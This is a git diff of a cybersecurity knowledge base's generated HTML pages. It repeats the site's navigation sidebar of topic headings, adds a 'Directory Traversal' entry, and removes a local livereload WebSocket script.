      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -223,22 +223,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/index.html b/docs/Reverse Engineering/Assembly Programming/x86-64/index.html index 2c8c2170..47ec48c6 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/index.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Assembly.html b/docs/Reverse Engineering/Assembly.html index 57948779..aace2483 100644 --- a/docs/Reverse Engineering/Assembly.html +++ b/docs/Reverse Engineering/Assembly.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
